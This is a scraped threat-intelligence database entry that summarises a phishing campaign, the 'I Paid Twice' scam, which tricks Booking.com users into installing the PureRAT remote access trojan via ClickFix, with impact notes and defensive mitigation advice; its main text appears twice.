“I Paid Twice” Scam Infects Booking.com and Other Booking Sites' Users with PureRAT via ClickFix
The “I Paid Twice” scam targets users of Booking. com and other booking platforms by leveraging phishing techniques to deliver the PureRAT malware through a malicious tool called ClickFix. Victims are deceived into believing they have been charged twice for bookings, prompting them to interact with fraudulent links or downloads. This interaction results in the installation of PureRAT, a remote access trojan capable of stealing sensitive data and enabling persistent unauthorized access. The scam exploits user trust in popular travel booking sites and uses social engineering to bypass technical defenses. While no known exploits are currently widespread, the potential for data theft and account compromise is significant. European organizations and individuals using these platforms are at risk, especially given the high volume of travel-related transactions. Mitigation requires user education, enhanced email and web filtering, and monitoring for unusual account activity. Countries with high tourism activity and frequent use of Booking. com, such as Germany, France, and the UK, are most likely to be targeted.
AI Analysis
Technical Summary
This threat involves a phishing scam dubbed the “I Paid Twice” scam, which targets users of Booking.com and other online booking platforms. The scam convinces victims that they have been charged twice for their bookings, prompting them to click on malicious links or download files purportedly to resolve the issue. These links or downloads deliver PureRAT, a remote access trojan (RAT) that allows attackers to gain persistent, unauthorized access to infected systems. PureRAT can exfiltrate sensitive information, including credentials, personal data, and financial details, and may facilitate further lateral movement within compromised networks. The malware is distributed via a tool or method referred to as ClickFix, which likely serves as the delivery mechanism or social engineering lure. The attack leverages social engineering to exploit user trust in reputable booking platforms, bypassing technical controls by relying on user interaction. Although no widespread exploitation has been reported yet, the scam's potential impact is considerable due to the sensitive nature of the targeted users and the capabilities of PureRAT. The phishing campaign is disseminated through email or possibly fake websites mimicking legitimate booking services. The technical details are limited, but the threat is confirmed through a Reddit InfoSec news post linking to an external article, indicating emerging awareness but minimal current discussion or exploitation. The scam's success depends on deceiving users into executing the malware payload, highlighting the importance of user vigilance and robust endpoint protection.
Potential Impact
For European organizations, the impact of this threat includes potential compromise of employee and customer credentials, unauthorized access to corporate networks, and data breaches involving sensitive personal and financial information. Organizations in the travel, hospitality, and financial sectors are particularly vulnerable due to their direct interaction with booking platforms and payment processing. The infection of endpoints with PureRAT can lead to persistent backdoors, enabling attackers to conduct espionage, data theft, or deploy additional malware such as ransomware. The scam can also damage brand reputation and customer trust if users associate the organization with fraudulent activity. Given the high volume of travel-related transactions in Europe and the reliance on platforms like Booking.com, the threat poses a significant risk to both individual users and enterprises. The phishing vector and requirement for user interaction limit the scope somewhat, but the widespread use of these services increases the potential victim pool. Additionally, the timing of attacks around peak travel seasons could amplify the impact. The threat may also affect supply chains and third-party vendors connected to booking platforms, further extending its reach.
Mitigation Recommendations
European organizations should implement targeted user awareness campaigns focusing on phishing scams related to travel bookings, emphasizing verification of payment claims through official channels only. Deploy advanced email filtering solutions capable of detecting and quarantining phishing emails with malicious links or attachments related to booking scams. Utilize web filtering to block access to known malicious domains and URLs associated with ClickFix or PureRAT distribution. Enforce multi-factor authentication (MFA) on all accounts related to booking platforms and corporate email to reduce the risk of credential compromise. Monitor network traffic and endpoint behavior for indicators of PureRAT infection, such as unusual outbound connections or persistence mechanisms. Regularly update and patch endpoint security solutions to detect and remediate RAT infections promptly. Encourage users to report suspicious emails or messages immediately and establish clear incident response procedures for potential infections. Collaborate with booking platforms to share threat intelligence and verify suspicious transactions. Finally, conduct periodic simulated phishing exercises tailored to travel-related scams to improve user resilience.
Affected Countries
Germany, France, United Kingdom, Italy, Spain, Netherlands
“I Paid Twice” Scam Infects Booking.com and Other Booking Sites' Users with PureRAT via ClickFix
Description
The “I Paid Twice” scam targets users of Booking. com and other booking platforms by leveraging phishing techniques to deliver the PureRAT malware through a malicious tool called ClickFix. Victims are deceived into believing they have been charged twice for bookings, prompting them to interact with fraudulent links or downloads. This interaction results in the installation of PureRAT, a remote access trojan capable of stealing sensitive data and enabling persistent unauthorized access. The scam exploits user trust in popular travel booking sites and uses social engineering to bypass technical defenses. While no known exploits are currently widespread, the potential for data theft and account compromise is significant. European organizations and individuals using these platforms are at risk, especially given the high volume of travel-related transactions. Mitigation requires user education, enhanced email and web filtering, and monitoring for unusual account activity. Countries with high tourism activity and frequent use of Booking. com, such as Germany, France, and the UK, are most likely to be targeted.
AI-Powered Analysis
Technical Analysis
This threat involves a phishing scam dubbed the “I Paid Twice” scam, which targets users of Booking.com and other online booking platforms. The scam convinces victims that they have been charged twice for their bookings, prompting them to click on malicious links or download files purportedly to resolve the issue. These links or downloads deliver PureRAT, a remote access trojan (RAT) that allows attackers to gain persistent, unauthorized access to infected systems. PureRAT can exfiltrate sensitive information, including credentials, personal data, and financial details, and may facilitate further lateral movement within compromised networks. The malware is distributed via a tool or method referred to as ClickFix, which likely serves as the delivery mechanism or social engineering lure. The attack leverages social engineering to exploit user trust in reputable booking platforms, bypassing technical controls by relying on user interaction. Although no widespread exploitation has been reported yet, the scam's potential impact is considerable due to the sensitive nature of the targeted users and the capabilities of PureRAT. The phishing campaign is disseminated through email or possibly fake websites mimicking legitimate booking services. The technical details are limited, but the threat is confirmed through a Reddit InfoSec news post linking to an external article, indicating emerging awareness but minimal current discussion or exploitation. The scam's success depends on deceiving users into executing the malware payload, highlighting the importance of user vigilance and robust endpoint protection.
Potential Impact
For European organizations, the impact of this threat includes potential compromise of employee and customer credentials, unauthorized access to corporate networks, and data breaches involving sensitive personal and financial information. Organizations in the travel, hospitality, and financial sectors are particularly vulnerable due to their direct interaction with booking platforms and payment processing. The infection of endpoints with PureRAT can lead to persistent backdoors, enabling attackers to conduct espionage, data theft, or deploy additional malware such as ransomware. The scam can also damage brand reputation and customer trust if users associate the organization with fraudulent activity. Given the high volume of travel-related transactions in Europe and the reliance on platforms like Booking.com, the threat poses a significant risk to both individual users and enterprises. The phishing vector and requirement for user interaction limit the scope somewhat, but the widespread use of these services increases the potential victim pool. Additionally, the timing of attacks around peak travel seasons could amplify the impact. The threat may also affect supply chains and third-party vendors connected to booking platforms, further extending its reach.
Mitigation Recommendations
European organizations should implement targeted user awareness campaigns focusing on phishing scams related to travel bookings, emphasizing verification of payment claims through official channels only. Deploy advanced email filtering solutions capable of detecting and quarantining phishing emails with malicious links or attachments related to booking scams. Utilize web filtering to block access to known malicious domains and URLs associated with ClickFix or PureRAT distribution. Enforce multi-factor authentication (MFA) on all accounts related to booking platforms and corporate email to reduce the risk of credential compromise. Monitor network traffic and endpoint behavior for indicators of PureRAT infection, such as unusual outbound connections or persistence mechanisms. Regularly update and patch endpoint security solutions to detect and remediate RAT infections promptly. Encourage users to report suspicious emails or messages immediately and establish clear incident response procedures for potential infections. Collaborate with booking platforms to share threat intelligence and verify suspicious transactions. Finally, conduct periodic simulated phishing exercises tailored to travel-related scams to improve user resilience.
Affected Countries
For access to advanced analysis and higher rate limits, contact root@offseq.com
Technical Details
- Source Type
- Subreddit
- InfoSecNews
- Reddit Score
- 2
- Discussion Level
- minimal
- Content Source
- reddit_link_post
- Domain
- hackread.com
- Newsworthiness Assessment
- {"score":27.200000000000003,"reasons":["external_link","established_author","very_recent"],"isNewsworthy":true,"foundNewsworthy":[],"foundNonNewsworthy":[]}
- Has External Source
- true
- Trusted Domain
- false
Threat ID: 690e17380d6e36ffa27aa06b
Added to database: 11/7/2025, 3:58:48 PM
Last enriched: 11/7/2025, 3:59:06 PM
Last updated: 11/8/2025, 5:12:27 AM
Views: 7
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Related Threats
How scammers use email for blackmail and extortion | Kaspersky official blog
MediumWhat’s That Coming Over The Hill? (Monsta FTP Remote Code Execution CVE-2025-34299) - watchTowr Labs
MediumFake 0-Day Exploit Emails Trick Crypto Users Into Running Malicious Code
HighFree test for Post-Quantum Cryptography TLS
MediumThe DragonForce Cartel: Scattered Spider at the gate
MediumActions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
Need enhanced features?
Contact root@offseq.com for Pro access with improved analysis and higher rate limits.